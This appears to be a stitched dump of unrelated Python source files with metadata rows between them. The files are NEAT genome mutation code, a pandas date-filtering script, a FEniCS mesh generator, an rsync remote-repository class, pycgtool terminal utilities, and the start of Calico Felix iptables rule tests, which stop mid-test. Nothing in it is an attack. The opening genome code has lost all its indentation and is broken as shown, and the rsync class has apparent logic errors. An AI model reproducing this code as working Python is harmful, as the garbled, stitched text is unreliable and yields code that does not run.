def get_new_hidden_id(self):
new_id = 0
while new_id in self.node_genes:
new_id += 1
return new_id
def mutate_add_node(self, innovation_indexer):
if not self.conn_genes:
return None
# Choose a random connection to split
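        # Classic NEAT add-node mutation: split an existing connection with a new
        # hidden node; conn_to_split.split() is expected to return the two
        # replacement connections on either side of the new node.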
conn_to_split = choice(list(self.conn_genes.values()))
new_node_id = self.get_new_hidden_id()
act_func = choice(self.config.activation_functions)
ng = self.config.node_gene_type(new_node_id, 'HIDDEN', activation_type=act_func)
assert ng.ID not in self.node_genes
self.node_genes[ng.ID] = ng
new_conn1, new_conn2 = conn_to_split.split(innovation_indexer, ng.ID)
self.conn_genes[new_conn1.key] = new_conn1
self.conn_genes[new_conn2.key] = new_conn2
return ng, conn_to_split # the return is only used in genome_feedforward
def mutate_add_connection(self, innovation_indexer):
'''
Attempt to add a new connection, the only restriction being that the output
node cannot be one of the network input nodes.
'''
in_node = choice(list(self.node_genes.values()))
# TODO: We do this filtering of input/output/hidden nodes a lot;
# they should probably be separate collections.
possible_outputs = [n for n in self.node_genes.values() if n.type != 'INPUT']
out_node = choice(possible_outputs)
# Only create the connection if it doesn't already exist.
key = (in_node.ID, out_node.ID)
if key not in self.conn_genes:
weight = gauss(0, self.config.weight_stdev)
enabled = choice([False, True])
innovation_id = innovation_indexer.get_innovation_id(in_node.ID, out_node.ID)
cg = self.config.conn_gene_type(innovation_id, in_node.ID, out_node.ID, weight, enabled)
self.conn_genes[cg.key] = cg
def mutate_delete_node(self):
# Do nothing if there are no hidden nodes.
if len(self.node_genes) <= self.num_inputs + self.num_outputs:
return -1
idx = None
while 1:
idx = choice(list(self.node_genes.keys()))
if self.node_genes[idx].type == 'HIDDEN':
break
node = self.node_genes[idx]
node_id = node.ID
keys_to_delete = set()
for key, value in self.conn_genes.items():
if value.in_node_id == node_id or value.out_node_id == node_id:
keys_to_delete.add(key)
# Do not allow deletion of all connection genes.
if len(keys_to_delete) >= len(self.conn_genes):
return -1
for key in keys_to_delete:
del self.conn_genes[key]
del self.node_genes[idx]
assert len(self.conn_genes) > 0
assert len(self.node_genes) >= self.num_inputs + self.num_outputs
return node_id
def mutate_delete_connection(self):
if len(self.conn_genes) > self.num_inputs + self.num_outputs:
key = choice(list(self.conn_genes.keys()))
del self.conn_genes[key]
assert len(self.conn_genes) > 0
assert len(self.node_genes) >= self.num_inputs + self.num_outputs
# compatibility function
def distance(self, other):
""" Returns the distance between this genome and the other. """
if len(self.conn_genes) > len(other.conn_genes):
genome1 = self
genome2 = other
else:
genome1 = other
genome2 = self
# Compute node gene differences.
excess1 = sum(1 for k1 in genome1.node_genes if k1 not in genome2.node_genes)
excess2 = sum(1 for k2 in genome2.node_genes if k2 not in genome1.node_genes)
common_nodes = [k1 for k1 in genome1.node_genes if k1 in genome2.node_genes]
bias_diff = 0.0
response_diff = 0.0
activation_diff = 0
for n in common_nodes:
g1 = genome1.node_genes[n]
g2 = genome2.node_genes[n]
bias_diff += math.fabs(g1.bias - g2.bias)
response_diff += math.fabs(g1.response - g2.response)
if g1.activation_type != g2.activation_type:
activation_diff += 1
most_nodes = max(len(genome1.node_genes), len(genome2.node_genes))
distance = (self.config.excess_coefficient * float(excess1 + excess2) / most_nodes
+ self.config.excess_coefficient * float(activation_diff) / most_nodes
+ self.config.weight_coefficient * (bias_diff + response_diff) / len(common_nodes))
# Compute connection gene differences.
if genome1.conn_genes:
N = len(genome1.conn_genes)
weight_diff = 0
matching = 0
disjoint = 0
excess = 0
max_cg_genome2 = None
if genome2.conn_genes:
max_cg_genome2 = max(genome2.conn_genes.values())
for cg1 in genome1.conn_genes.values():
try:
cg2 = genome2.conn_genes[cg1.key]
except KeyError:
if max_cg_genome2 is not None and cg1 > max_cg_genome2:
excess += 1
else:
disjoint += 1
else:
# Homologous genes
weight_diff += math.fabs(cg1.weight - cg2.weight)
matching += 1
if cg1.enabled != cg2.enabled:
weight_diff += 1.0
disjoint += len(genome2.conn_genes) - matching
distance += self.config.excess_coefficient * float(excess) / N
distance += self.config.disjoint_coefficient * float(disjoint) / N
if matching > 0:
distance += self.config.weight_coefficient * (weight_diff / matching)
return distance
def size(self):
'''Returns genome 'complexity', taken to be (number of hidden nodes, number of enabled connections)'''
num_hidden_nodes = len(self.node_genes) - self.num_inputs - self.num_outputs
num_enabled_connections = sum([1 for cg in self.conn_genes.values() if cg.enabled is True])
return num_hidden_nodes, num_enabled_connections
def __lt__(self, other):
'''Order genomes by fitness.'''
return self.fitness < other.fitness
def __str__(self):
s = "Nodes:"
for ng in self.node_genes.values():
s += "\n\t" + str(ng)
s += "\nConnections:"
connections = list(self.conn_genes.values())
connections.sort()
for c in connections:
s += "\n\t" + str(c)
return s
def add_hidden_nodes(self, num_hidden):
node_id = self.get_new_hidden_id()
for i in range(num_hidden):
act_func = choice(self.config.activation_functions)
node_gene = self.config.node_gene_type(node_id,
node_type='HIDDEN',
activation_type=act_func)
assert node_gene.ID not in self.node_genes
self.node_genes[node_gene.ID] = node_gene
node_id += 1
# TODO: Can this be changed to not need a configuration object?
@classmethod
def create_unconnected(cls, ID, config):
'''Create a genome for a network with no hidden nodes and no connections.'''
c = cls(ID, config, None, None)
node_id = 0
# Create input node genes.
for i in range(config.input_nodes):
assert node_id not in c.node_genes
c.node_genes[node_id] = config.node_gene_type(node_id, 'INPUT')
node_id += 1
# Create output node genes.
for i in range(config.output_nodes):
act_func = choice(config.activation_functions)
node_gene = config.node_gene_type(node_id,
node_type='OUTPUT',
activation_type=act_func)
assert node_gene.ID not in c.node_genes
c.node_genes[node_gene.ID] = node_gene
node_id += 1
assert node_id == len(c.node_genes)
return c
def connect_fs_neat(self, innovation_indexer):
""" Randomly connect one input to all hidden and output nodes (FS-NEAT). """
in_genes = [g for g in self.node_genes.values() if g.type == 'INPUT']
hid_genes = [g for g in self.node_genes.values() if g.type == 'HIDDEN']
out_genes = [g for g in self.node_genes.values() if g.type == 'OUTPUT']
ig = choice(in_genes)
for og in hid_genes + out_genes:
weight = gauss(0, self.config.weight_stdev)
innovation_id = innovation_indexer.get_innovation_id(ig.ID, og.ID)
cg = self.config.conn_gene_type(innovation_id, ig.ID, og.ID, weight, True)
self.conn_genes[cg.key] = cg
def compute_full_connections(self):
""" Create a fully-connected genome. """
in_genes = [g for g in self.node_genes.values() if g.type == 'INPUT']
hid_genes = [g for g in self.node_genes.values() if g.type == 'HIDDEN']
out_genes = [g for g in self.node_genes.values() if g.type == 'OUTPUT']
# Connect each input node to all hidden and output nodes.
connections = []
for ig in in_genes:
for og in hid_genes + out_genes:
connections.append((ig.ID, og.ID))
# Connect each hidden node to all output nodes.
for hg in hid_genes:
for og in out_genes:
connections.append((hg.ID, og.ID))
return connections
def connect_full(self, innovation_indexer):
""" Create a fully-connected genome. """
for input_id, output_id in self.compute_full_connections():
weight = gauss(0, self.config.weight_stdev)
innovation_id = innovation_indexer.get_innovation_id(input_id, output_id)
cg = self.config.conn_gene_type(innovation_id, input_id, output_id, weight, True)
self.conn_genes[cg.key] = cg
def connect_partial(self, innovation_indexer, fraction):
assert 0 <= fraction <= 1
all_connections = self.compute_full_connections()
shuffle(all_connections)
num_to_add = int(round(len(all_connections) * fraction))
for input_id, output_id in all_connections[:num_to_add]:
weight = gauss(0, self.config.weight_stdev)
innovation_id = innovation_indexer.get_innovation_id(input_id, output_id)
cg = self.config.conn_gene_type(innovation_id, input_id, output_id, weight, True)
self.conn_genes[cg.key] = cg
class FFGenome(Genome):
""" A genome for feed-forward neural networks. Feed-forward
topologies are a particular case of Recurrent NNs.
"""
def __init__(self, ID, config, parent1_id, parent2_id):
super(FFGenome, self).__init__(ID, config, parent1_id, parent2_id)
self.node_order = [] # hidden node order
def inherit_genes(self, parent1, parent2):
super(FFGenome, self).inherit_genes(parent1, parent2)
self.node_order = list(parent1.node_order)
assert (len(self.node_order) == len([n for n in self.node_genes.values() if n.type == 'HIDDEN']))
def mutate_add_node(self, innovation_indexer):
result = super(FFGenome, self).mutate_add_node(innovation_indexer)
if result is None:
return
ng, split_conn = result
# Add node to node order list: after the presynaptic node of the split connection
# and before the postsynaptic node of the split connection
if self.node_genes[split_conn.in_node_id].type == 'HIDDEN':
mini = self.node_order.index(split_conn.in_node_id) + 1
else:
# Presynaptic node is an input node, not hidden node
mini = 0
if self.node_genes[split_conn.out_node_id].type == 'HIDDEN':
maxi = self.node_order.index(split_conn.out_node_id)
else:
# Postsynaptic node is an output node, not hidden node
maxi = len(self.node_order)
self.node_order.insert(randint(mini, maxi), ng.ID)
assert (len(self.node_order) == len([n for n in self.node_genes.values() if n.type == 'HIDDEN']))
return ng, split_conn
def mutate_add_connection(self, innovation_indexer):
'''
Attempt to add a new connection, with the restrictions that (1) the output node
cannot be one of the network input nodes, and (2) the connection must be feed-forward.
'''
possible_inputs = [n for n in self.node_genes.values() if n.type != 'OUTPUT']
possible_outputs = [n for n in self.node_genes.values() if n.type != 'INPUT']
in_node = choice(possible_inputs)
out_node = choice(possible_outputs)
# Only create the connection if it's feed-forward and it doesn't already exist.
if self.__is_connection_feedforward(in_node, out_node):
key = (in_node.ID, out_node.ID)
if key not in self.conn_genes:
weight = gauss(0, self.config.weight_stdev)
enabled = choice([False, True])
innovation_id = innovation_indexer.get_innovation_id(in_node.ID, out_node.ID)
cg = self.config.conn_gene_type(innovation_id, in_node.ID, out_node.ID, weight, enabled)
self.conn_genes[cg.key] = cg
def mutate_delete_node(self):
deleted_id = super(FFGenome, self).mutate_delete_node()
if deleted_id != -1:
self.node_order.remove(deleted_id)
assert len(self.node_genes) >= self.num_inputs + self.num_outputs
def __is_connection_feedforward(self, in_node, out_node):
if in_node.type == 'INPUT' or out_node.type == 'OUTPUT':
return True
assert in_node.ID in self.node_order
assert out_node.ID in self.node_order
return self.node_order.index(in_node.ID) < self.node_order.index(out_node.ID)
def add_hidden_nodes(self, num_hidden):
node_id = self.get_new_hidden_id()
for i in range(num_hidden):
act_func = choice(self.config.activation_functions)
node_gene = self.config.node_gene_type(node_id,
node_type='HIDDEN',
activation_type=act_func)
assert node_gene.ID not in self.node_genes
self.node_genes[node_gene.ID] = node_gene
self.node_order.append(node_gene.ID)
node_id += 1
def __str__(self):
s = super(FFGenome, self).__str__()
s += '\nNode order: ' + str(self.node_order)
return s
| bsd-3-clause | -6,289,822,825,548,730,000 | 39.539301 | 119 | 0.574137 | false |
robmarano/nyu-python | course-2/session-7/pandas/df_basics.py | 1 | 2677 | #!/usr/bin/env python3
try:
# for Python 2.x
import StringIO
except:
# for Python 3.x
import io
import csv
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import re
# define data
csv_input = """timestamp,title,reqid
2016-07-23 11:05:08,SVP,2356556-AS
2016-12-12 01:23:33,VP,5567894-AS
2016-09-13 12:43:33,VP,3455673-AS
2016-09-13 19:43:33,EVP,8455673-AS
2016-09-30 11:43:33,VP,9455673-AS
2016-08-02 01:23:33,VP,5698765-AS
2016-04-22 01:23:33,VP,1234556-AS
"""
# load data
try:
# for Python 2.x
f = StringIO.StringIO(csv_input)
except:
# for Python 3.x
f = io.StringIO(csv_input)
reader = csv.reader(f, delimiter=',')
for row in reader:
print('\t'.join(row))
# reset file pointer position to beginning of file
f.seek(0)
# create pandas dataframe
#df = pd.read_csv(io.StringIO(csv_input))
df = pd.read_csv(f)
print(df.head())
print(df.info())
print(df)
df['date'] = pd.DatetimeIndex(df.timestamp).normalize()
print(df)
print(df.index)
#df = df.drop('timestamp',axis=1)
df.drop('timestamp', axis=1, inplace=True)
#df = df.reindex(df.reqid, fill_value=0)
#df = df.reindex(df.reqid, method='bfill')
#print(df)
#print(df.index)
#i = df[((df.title == 'SVP') & (df.reqid == '3455673-AS'))].index
#df.drop(df.index[0],inplace=True)
#df.drop(i,inplace=True)
#i = df.index[0]
#df = df.drop(i)
#print(df)
#print(i)
print(type(df['date'][0]))
#df = df.sort_values(by='date',axis=0,ascending=True)
df.sort_values(by='date',axis=0,ascending=True,inplace=True)
print(df)
df['weekday'] = df['date'].apply( lambda x: x.dayofweek)
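# pandas dayofweek convention: Monday=0 through Sunday=6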
# setup date processing
now_string = '2016-10-01 08:01:20'
past_by_days = 30
time_delta = pd.to_timedelta('{} days'.format(past_by_days))
print(time_delta)
#now = pd.tslib.Timestamp('2016-10-01 08:01:20')
now = pd.Timestamp(now_string)
now_norm = now.normalize()
print(now_norm)
now_start = now_norm - time_delta
print(now_start)
# process
ddf = df.loc[((df['date'] >= now_start) & (df['date'] <= now_norm))]
print(ddf)
print('number of observations found in filtered df = {}'.format(len(ddf)))
print(len(ddf.columns))
# histogram of number of observations by date
df_grouped_date = df.groupby(['date'])
df_date_count = df_grouped_date['reqid'].aggregate(['count'])
#df_date_count = df_grouped_date.aggregate(['count'])
print(df_date_count)
#exclude_cols = ['title count']
#df_date_count.ix[:, df_date_count.columns.difference(exclude_cols)].plot(kind='bar')
df_date_count.loc[:, df_date_count.columns].plot(kind='bar')
plt.legend(loc='best').get_texts()[0].set_text('Reqs Added Per Day')
file_name = 'myBar'
file_name = re.sub(r'\s+', '_', file_name)
plt.savefig(file_name)
plt.show()
| mit | -4,452,807,237,788,922,400 | 22.482456 | 85 | 0.680613 | false |
mathLab/RBniCS | tutorials/11_quasi_geostrophic/data/generate_mesh.py | 1 | 1376 | # Copyright (C) 2015-2021 by the RBniCS authors
#
# This file is part of RBniCS.
#
# SPDX-License-Identifier: LGPL-3.0-or-later
from dolfin import *
from mshr import *
# Create mesh
domain = Rectangle(Point(0., 0.), Point(1., 1.))
mesh = generate_mesh(domain, 30)
# Create subdomains
subdomains = MeshFunction("size_t", mesh, 2)
subdomains.set_all(0)
# Create boundaries
class Left(SubDomain):
def inside(self, x, on_boundary):
return on_boundary and abs(x[0] - 0.) < DOLFIN_EPS
class Right(SubDomain):
def inside(self, x, on_boundary):
return on_boundary and abs(x[0] - 1.) < DOLFIN_EPS
class Bottom(SubDomain):
def inside(self, x, on_boundary):
return on_boundary and abs(x[1] - 0.) < DOLFIN_EPS
class Top(SubDomain):
def inside(self, x, on_boundary):
return on_boundary and abs(x[1] - 1.) < DOLFIN_EPS
boundaries = MeshFunction("size_t", mesh, mesh.topology().dim() - 1)
bottom = Bottom()
bottom.mark(boundaries, 1)
right = Right()
right.mark(boundaries, 2)
top = Top()
top.mark(boundaries, 3)
left = Left()
left.mark(boundaries, 4)
# Save
File("square.xml") << mesh
File("square_physical_region.xml") << subdomains
File("square_facet_region.xml") << boundaries
XDMFFile("square.xdmf").write(mesh)
XDMFFile("square_physical_region.xdmf").write(subdomains)
XDMFFile("square_facet_region.xdmf").write(boundaries)
| lgpl-3.0 | 7,467,292,417,435,287,000 | 23.571429 | 68 | 0.68532 | false |
Hummer12007/pomu | pomu/repo/remote/rsync.py | 1 | 1673 | """A class for remote rsync repos"""
from os import rmdir, mkfifo, unlink, path
from subprocess import run, PIPE
from tempfile import mkdtemp
from pomu.repo.remote.remote import RemoteRepo, normalize_key
from pomu.util.result import Result
class RemoteRsyncRepo(RemoteRepo):
"""A class responsible for rsync remotes"""
def __init__(self, url):
self.uri = url
def __enter__(self):
pass
def __exit__(self, *_):
pass
def fetch_tree(self):
"""Returns repos hierarchy"""
if hasattr(self, '_tree'):
return self._tree
d = mkdtemp()
        p = run(['rsync', '-rn', '--out-format=%n', self.uri, d],
                stdout=PIPE, universal_newlines=True)
rmdir(d)
if p.returncode:
return Result.Err()
self._tree = ['/' + x for x in p.stdout.split('\n')]
return self._tree
def fetch_subtree(self, key):
"""Lists a subtree"""
k = normalize_key(key, True)
self.fetch_tree()
dic = dict(self._tree)
if k not in dic:
return []
l = len(key)
return Result.Ok(
[tpath[l:] for tpath in self.fetch_tree() if tpath.startswith(k)])
def fetch_file(self, key):
"""Fetches a file from the repo"""
k = normalize_key(key)
self.fetch_tree()
dic = dict(self._tree)
if k not in dic:
return Result.Err()
d = mkdtemp()
fip = path.join(d, 'fifo')
mkfifo(fip)
        p = run(['rsync', self.uri.rstrip('/') + key, fip])
        with open(fip) as fifo:
            fout = fifo.read()
        unlink(fip)
rmdir(d)
if p.returncode:
return Result.Err()
return Result.Ok(fout)
| gpl-2.0 | -8,406,564,571,039,926,000 | 27.355932 | 82 | 0.537358 | false |
jag1g13/pycgtool | pycgtool/interface.py | 1 | 9604 | """
This module contains classes for interaction at the terminal.
"""
import collections
import curses
import curses.textpad
import time
class Options:
"""
Class to hold program options not specified at the initial command line.
Values can be queried by indexing as a dictionary or by attribute. Iterable.
"""
def __init__(self, default, args=None):
"""
Create Options instance from iterable of keys and default values.
:param default: Iterable of key, default value pairs (e.g. list of tuples)
:param args: Optional program arguments from Argparse, will be displayed in interactive mode
"""
self._dict = collections.OrderedDict()
for key, val in default:
try:
val = val.lower()
except AttributeError:
pass
self._dict[key.lower()] = (val, type(val))
# Allow to carry options from argparse
self.args = args
def __getattr__(self, attr):
return self._dict[attr.lower()][0]
def __repr__(self):
res = "[" + ", ".join((str((key, val[0])) for key, val in self._dict.items())) + "]"
return res
def __iter__(self):
return iter(((key, val[0]) for key, val in self._dict.items()))
def __len__(self):
return len(self._dict)
def __getitem__(self, item):
try:
return self._dict[item]
except KeyError:
try:
opt = list(self._dict.keys())[item]
return self._dict[opt][0]
except TypeError:
raise TypeError("Must access Options using either a string or an integer")
def set(self, opt, val):
"""
Set an argument by name.
:param opt: Option to set
:param val: Value to set option to
"""
opt = opt.lower()
try:
val = val.lower()
except AttributeError:
pass
_type = self._dict[opt][1]
if _type is not type(val):
if _type is bool:
self._dict[opt] = (_truthy(val), bool)
else:
self._dict[opt] = (_type(val), _type)
else:
self._dict[opt] = (val, _type)
def _set_by_num(self, opt_num, val):
"""
Set an argument if only its position in sequence is known.
For use in Options._inter.
:param opt_num: Sequence number of option to set
:param val: Value to set option to
"""
opt = list(self._dict.keys())[opt_num]
self.set(opt, val)
def toggle_boolean(self, opt):
"""
Toggle a boolean argument by name.
:param opt: Option to toggle
"""
entry = self._dict[opt]
if entry[1] is bool:
self._dict[opt] = (not entry[0], entry[1])
else:
raise TypeError("Only boolean options can be toggled")
def _toggle_boolean_by_num(self, opt_num):
"""
Toggle a boolean argument if only its position in sequence is known.
For use in Options._inter.
:param opt_num: Sequence number of option to toggle
"""
opt = list(self._dict.keys())[opt_num]
self.toggle_boolean(opt)
def interactive(self):
"""
Read options in interactive terminal mode using curses.
"""
curses.wrapper(self._inter)
def _inter(self, stdscr):
"""
Read options in interactive terminal mode using curses.
:param stdscr: Curses window to use as interface
"""
stdscr.clear()
if self.args is not None:
stdscr.addstr(1, 1, "Using GRO: {0}".format(self.args.gro))
stdscr.addstr(2, 1, "Using XTC: {0}".format(self.args.xtc))
stdscr.addstr(4, 1, "Press q to proceed")
stdscr.box()
stdscr.refresh()
nrows = len(self)
errscr = stdscr.derwin(3, curses.COLS - 3, nrows + 8, 1)
errscr.border()
window_config = stdscr.derwin(nrows + 2, curses.COLS - 3, 5, 1)
window_config.box()
window_config.refresh()
window_keys = window_config.derwin(nrows, 20, 1, 0)
window_config.vline(1, 18, curses.ACS_VLINE, nrows)
window_vals = window_config.derwin(nrows, curses.COLS - 24, 1, 20)
text_edit_wins = []
text_inputs = []
for i, (key, value) in enumerate(self):
window_keys.addstr(i, 0, key)
try:
text_edit_wins.append(window_vals.derwin(1, 30, i, 0))
except curses.error as e:
raise RuntimeError("Your terminal is too small to fit the interface, please expand it") from e
text_edit_wins[-1].addstr(0, 0, str(value))
text_inputs.append(curses.textpad.Textbox(text_edit_wins[-1]))
stdscr.refresh()
window_keys.refresh()
for window in text_edit_wins:
window.refresh()
pos = 0
move = {"KEY_UP": lambda x: (x - 1) % nrows,
"KEY_DOWN": lambda x: (x + 1) % nrows,
"KEY_LEFT": lambda x: x,
"KEY_RIGHT": lambda x: x}
while True:
key = text_edit_wins[pos].getkey(0, 0)
errscr.erase()
if key in move:
pos = move[key](pos)
if key == "\n":
if type(self[pos]) is bool:
self._toggle_boolean_by_num(pos)
else:
val = text_inputs[pos].edit().strip()
try:
self._set_by_num(pos, val)
except ValueError:
errscr.addstr(0, 0, "Invalid value '{0}' for option".format(val))
errscr.addstr(1, 0, "Value has been reset".format(val))
text_edit_wins[pos].erase()
text_edit_wins[pos].addstr(0, 0, str(self[pos]))
text_edit_wins[pos].refresh()
errscr.refresh()
if key == "q":
break
def _truthy(string):
"""
Evaluate a string as True or False in the natural way.
:param string: String to evaluate
:return: True or False
"""
truthy_strings = ("yes", "y", "on", "true", "t", "1")
falsey_strings = ("no", "n", "off", "false", "f", "0")
string = string.lower().strip()
if string in truthy_strings:
return True
elif string in falsey_strings:
return False
else:
raise ValueError("Value '{0}' could not be converted to boolean".format(string))
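# Illustrative Options usage (a sketch; the option names and values below are
# made up and not part of this module):
#     opts = Options([("output", "gro"), ("map_only", False)])
#     opts.set("map_only", "yes")   # strings are coerced through _truthy for bools
#     opts.map_only                 # -> True
#     opts["output"]                # -> ("gro", str) when indexed by name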
class Progress:
"""
Display a progress bar during the main loop of a program.
"""
def __init__(self, maxits, length=20, dowhile=None, quiet=False):
"""
Return progress bar instance to handle printing of a progress bar within loops.
:param maxits: Expected number of iterations
:param length: Length of progress bar in characters
:param dowhile: Function to call after each iteration, stops if False
:param quiet: Skip printing of progress bar - for testing
"""
self._maxits = maxits
self._length = length
self._dowhile = dowhile
self._quiet = quiet
self._its = -1
self._start_time = time.clock()
def __len__(self):
"""
Maximum iterator length.
This length will be reached if the iterator is not stopped by a False dowhile condition or KeyboardInterrupt.
:return: Maximum length of iterator
"""
return self._maxits - self._its
def __iter__(self):
return self
def __next__(self):
"""
Allow iteration over Progress while testing dowhile condition.
Will catch Ctrl-C and return control as if the iterator has been fully consumed.
:return: Iteration number
"""
self._its += 1
try:
if self._dowhile is not None and self._its > 0 and not self._dowhile():
self._stop()
except KeyboardInterrupt:
print(end="\r")
self._stop()
if self._its >= self._maxits:
self._stop()
if not self._quiet:
self._display()
return self._its
def run(self):
"""
Iterate through self until stopped by maximum iterations or False condition.
Use the tqdm library if it is present.
"""
no_tqdm = False
try:
from tqdm import tqdm
except ImportError:
no_tqdm = True
if self._quiet or no_tqdm:
collections.deque(self, maxlen=0)
else:
self._quiet = True
collections.deque(tqdm(self, total=len(self)-1, ncols=80), maxlen=0)
self._quiet = False
return self._its
@property
def _bar(self):
done = int(self._length * (self._its / self._maxits))
left = self._length - done
width = len(str(self._maxits))
return "{0:-{width}} [".format(self._its, width=width) + done * "#" + left * "-" + "] {0}".format(self._maxits)
def _stop(self):
if not self._quiet:
time_taken = int(time.clock() - self._start_time)
print(self._bar + " took {0}s".format(time_taken))
raise StopIteration
def _display(self):
try:
time_remain = int((time.clock() - self._start_time) * ((self._maxits - self._its) / self._its))
except ZeroDivisionError:
time_remain = "-"
print(self._bar + " {0}s left".format(time_remain), end="\r")
| gpl-3.0 | 1,517,225,959,199,254,800 | 29.980645 | 119 | 0.53915 | false |
TrimBiggs/calico | calico/felix/test/test_fiptgenerator.py | 1 | 22422 | # -*- coding: utf-8 -*-
# Copyright 2015 Metaswitch Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
felix.test.test_fiptgenerator.py
~~~~~~~~~~~~~~~~~~~~~~~~~
Tests of iptables rules generation function.
"""
import logging
from collections import OrderedDict
from calico.felix.selectors import parse_selector
from mock import Mock
from calico.datamodel_v1 import TieredPolicyId
from calico.felix.fiptables import IptablesUpdater
from calico.felix.profilerules import UnsupportedICMPType
from calico.felix.test.base import BaseTestCase, load_config
_log = logging.getLogger(__name__)
DEFAULT_MARK = '--append %s --jump MARK --set-mark 0x1000000/0x1000000'
DEFAULT_UNMARK = (
'--append %s '
'--match comment --comment "No match, fall through to next profile" '
'--jump MARK --set-mark 0/0x1000000'
)
INPUT_CHAINS = {
"Default": [
'--append felix-INPUT ! --in-interface tap+ --jump RETURN',
'--append felix-INPUT --match conntrack --ctstate INVALID --jump DROP',
'--append felix-INPUT --match conntrack --ctstate RELATED,ESTABLISHED --jump ACCEPT',
'--append felix-INPUT --protocol tcp --destination 123.0.0.1 --dport 1234 --jump ACCEPT',
'--append felix-INPUT --protocol udp --sport 68 --dport 67 '
'--jump ACCEPT',
'--append felix-INPUT --protocol udp --dport 53 --jump ACCEPT',
'--append felix-INPUT --jump DROP -m comment --comment "Drop all packets from endpoints to the host"',
],
"IPIP": [
'--append felix-INPUT --protocol 4 --match set ! --match-set felix-hosts src --jump DROP',
'--append felix-INPUT ! --in-interface tap+ --jump RETURN',
'--append felix-INPUT --match conntrack --ctstate INVALID --jump DROP',
'--append felix-INPUT --match conntrack --ctstate RELATED,ESTABLISHED --jump ACCEPT',
'--append felix-INPUT --protocol tcp --destination 123.0.0.1 --dport 1234 --jump ACCEPT',
'--append felix-INPUT --protocol udp --sport 68 --dport 67 '
'--jump ACCEPT',
'--append felix-INPUT --protocol udp --dport 53 --jump ACCEPT',
'--append felix-INPUT --jump DROP -m comment --comment "Drop all packets from endpoints to the host"',
],
"Return": [
'--append felix-INPUT ! --in-interface tap+ --jump RETURN',
'--append felix-INPUT --match conntrack --ctstate INVALID --jump DROP',
'--append felix-INPUT --match conntrack --ctstate RELATED,ESTABLISHED --jump ACCEPT',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 130',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 131',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 132',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 133',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 135',
'--append felix-INPUT --jump ACCEPT --protocol ipv6-icmp --icmpv6-type 136',
'--append felix-INPUT --protocol udp --sport 546 --dport 547 --jump ACCEPT',
'--append felix-INPUT --protocol udp --dport 53 --jump ACCEPT',
'--append felix-INPUT --jump felix-FROM-ENDPOINT',
]
}
SELECTOR_A_EQ_B = parse_selector("a == 'b'")
RULES_TESTS = [
{
"ip_version": 4,
"tag_to_ipset": {},
"sel_to_ipset": {SELECTOR_A_EQ_B: "a-eq-b"},
"profile": {
"id": "prof1",
"inbound_rules": [
{"src_selector": SELECTOR_A_EQ_B,
"action": "next-tier"}
],
"outbound_rules": [
{"dst_selector": SELECTOR_A_EQ_B,
"action": "next-tier"}
]
},
"updates": {
'felix-p-prof1-i':
[
DEFAULT_MARK % "felix-p-prof1-i",
'--append felix-p-prof1-i '
'--match set --match-set a-eq-b src '
'--jump MARK --set-mark 0x2000000/0x2000000',
'--append felix-p-prof1-i --match mark '
'--mark 0x2000000/0x2000000 --jump RETURN',
DEFAULT_UNMARK % "felix-p-prof1-i",
],
'felix-p-prof1-o':
[
DEFAULT_MARK % "felix-p-prof1-o",
'--append felix-p-prof1-o '
'--match set --match-set a-eq-b dst '
'--jump MARK --set-mark 0x2000000/0x2000000',
'--append felix-p-prof1-o --match mark '
'--mark 0x2000000/0x2000000 --jump RETURN',
DEFAULT_UNMARK % "felix-p-prof1-o",
]
},
},
{
"ip_version": 4,
"tag_to_ipset": {
"src-tag": "src-tag-name",
"dst-tag": "dst-tag-name"
},
"profile": {
"id": "prof1",
"inbound_rules": [
{"src_net": "10.0.0.0/8"}
],
"outbound_rules": [
{"protocol": "icmp",
"src_net": "10.0.0.0/8",
"icmp_type": 7,
"icmp_code": 123}
]
},
"updates": {
'felix-p-prof1-i':
[
DEFAULT_MARK % "felix-p-prof1-i",
'--append felix-p-prof1-i --source 10.0.0.0/8 --jump RETURN',
DEFAULT_UNMARK % "felix-p-prof1-i",
],
'felix-p-prof1-o':
[
DEFAULT_MARK % "felix-p-prof1-o",
"--append felix-p-prof1-o --protocol icmp --source "
"10.0.0.0/8 --match icmp --icmp-type 7/123 --jump RETURN",
DEFAULT_UNMARK % "felix-p-prof1-o",
]
},
},
{
"ip_version": 4,
"tag_to_ipset": {
"src-tag": "src-tag-name",
"dst-tag": "dst-tag-name"
},
"profile": {
"id": "prof1",
"inbound_rules": [
{"protocol": "icmp",
"src_net": "10.0.0.0/8",
"icmp_type": 7
}
],
"outbound_rules": [
{"protocol": "tcp",
"src_ports": [0, "2:3", 4, 5, 6, 7, 8, 9, 10, 11, 12, 13,
14, 15, 16, 17]
}
]
},
"updates": {
'felix-p-prof1-i':
[
DEFAULT_MARK % "felix-p-prof1-i",
"--append felix-p-prof1-i --protocol icmp --source 10.0.0.0/8 "
"--match icmp --icmp-type 7 --jump RETURN",
DEFAULT_UNMARK % "felix-p-prof1-i",
],
'felix-p-prof1-o':
[
DEFAULT_MARK % "felix-p-prof1-o",
"--append felix-p-prof1-o --protocol tcp "
"--match multiport --source-ports 0,2:3,4,5,6,7,8,9,10,11,12,13,14,15 "
"--jump RETURN",
"--append felix-p-prof1-o --protocol tcp "
"--match multiport --source-ports 16,17 "
"--jump RETURN",
DEFAULT_UNMARK % "felix-p-prof1-o",
]
},
},
{
"ip_version": 6,
"tag_to_ipset": {
"src-tag": "src-tag-name",
"dst-tag": "dst-tag-name"
},
"profile": {
"id": "prof1",
"inbound_rules": [
{"protocol": "icmpv6",
"src_net": "1234::beef",
"icmp_type": 7
}
],
"outbound_rules": [
{"protocol": "icmpv6",
"src_net": "1234::beef",
"icmp_type": 7,
"action": "deny"
}
]
},
"updates": {
'felix-p-prof1-i':
[
DEFAULT_MARK % "felix-p-prof1-i",
"--append felix-p-prof1-i --protocol icmpv6 --source "
